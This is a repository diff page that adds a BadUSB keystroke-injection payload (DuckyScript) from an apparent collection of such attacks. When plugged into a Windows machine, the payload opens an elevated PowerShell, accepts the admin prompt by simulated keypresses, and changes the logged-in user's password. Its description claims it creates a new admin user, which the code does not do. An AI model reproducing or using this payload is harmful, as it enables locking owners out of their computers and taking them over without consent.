🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    BadUsb-Collection/Execution/setWinPass.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Create a new Windows-User with Admin perms.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +DELAY 500
     15 +ENTER
     16 +DELAY 560
     17 +STRING $User = ([Environment]::UserName)
     18 +DELAY 200
     19 +ENTER
     20 +DELAY 500
     21 +STRING $NewPassword = ConvertTo-SecureString "PASSWORD HERE" -AsPlainText -Force
     22 +DELAY 300
     23 +ENTER
     24 +DELAY 500
     25 +STRING Set-LocalUser -Name $User -Password $NewPassword
     26 +DELAY 300
     27 +ENTER
     28 +DELAY 600
     29 +exit
     30 + 
Please wait...
Page is in error, reload to recover